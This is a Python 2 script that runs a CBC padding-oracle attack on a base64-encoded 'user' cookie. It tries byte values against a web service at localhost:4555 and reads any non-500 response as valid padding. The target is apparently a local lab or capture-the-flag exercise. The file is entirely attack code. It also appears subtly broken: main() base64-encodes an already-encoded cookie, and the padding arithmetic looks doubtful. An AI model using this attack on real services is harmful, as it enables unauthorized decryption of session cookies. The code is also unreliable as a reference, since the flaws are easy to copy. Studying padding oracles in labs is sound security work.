#!/usr/bin/env python

import requests
import base64

URL = 'http://localhost:4555'


def test(cookie):
	encode = base64.b64encode(cookie)

	r = requests.get(URL, cookies={'user': encode})

	return r.status_code != 500

def getPlain(padLen, index):
	i = 16-index-1
	if i == 0:
		return padLen

	return i

		# print ''.join('{:02x}'.format(x) for x in prefix)

def decryptByte(cookie):
	iv = bytearray(16)

	for plainTextPlace in range(15, -1, -1):
		prefix = bytearray(16)
		print "START: ", plainTextPlace
		print ''.join('{:02x}'.format(x) for x in iv)

		print "Padding"
		for i in range(plainTextPlace + 1, 16):
			paddingVal = getPlain(16-plainTextPlace+1, i)
			print paddingVal
			prefix[i] = paddingVal ^ iv[i]

		for i in range(256):
			prefix[plainTextPlace] = i
			if(test(prefix + cookie)):
				print "chosen val", i
				break;

		iv[plainTextPlace] = prefix[plainTextPlace] ^  getPlain(16-plainTextPlace, plainTextPlace)

	plaintext = [0] * 16
	for i in range(16):
		plaintext[i] = iv[i] ^ cookie[i]

	return plaintext





def main():
	dummy = "k0UtzN9gwc1qfe2CMYn3rESGL6mJwyG8Z+ztkAJJBVM="
	cookie =  bytearray(base64.b64encode(dummy))

	print dummy
	plaintext = decryptByte(cookie)
	print (bytearray(plaintext))

if __name__ == '__main__':
    main()